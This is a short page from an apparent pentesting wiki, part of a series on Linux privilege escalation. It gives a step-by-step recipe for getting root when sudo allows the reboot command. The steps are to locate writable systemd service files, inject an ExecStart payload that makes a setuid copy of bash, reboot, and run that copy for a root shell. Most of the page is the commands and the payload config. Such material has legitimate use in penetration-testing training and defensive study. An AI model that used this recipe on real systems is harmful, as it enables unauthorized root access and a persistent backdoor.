Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Sudo Reboot Privilege Escalation

Sudo reboot commands might be vulnerable to privilege escalation (PrivEsc).

PreviousSudo Privilege Escalation by Overriding Shared LibraryNextSudo Screen Privilege Escalation

Last updated 1 year ago

sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot
Copied!

If we can execute "reboot" command as root, we can escalate to privileges.

We need to look for the system service config file which are writable.

find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service
Copied!

If we find a writable file, we can inject a payload into Service.ExecStart.

# /etc/systemd/systm/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
WantedBy=multi-user.target
Copied!

Now reboot as root.

sudo /usr/sbin/reboot
Copied!

After the system rebooted, the command in the ExecStart will be executed. Now we should get a root shell by executing the copied bash command.

/home/<username>/bash -p

Investigation
Exploitation
1. Find Service Config Files Which Are Writable
2. Insert a Payload
3. Reboot and Get a Root Shell
Page cover image